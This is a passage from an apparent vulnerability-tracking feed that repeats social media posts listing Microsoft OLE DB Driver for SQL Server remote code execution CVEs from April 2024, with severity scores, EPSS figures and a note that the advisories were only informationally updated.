  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28944
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29983
(8.8 HIGH)

EPSS: 0.04%

updated 2024-04-09T18:30:36

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28931
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
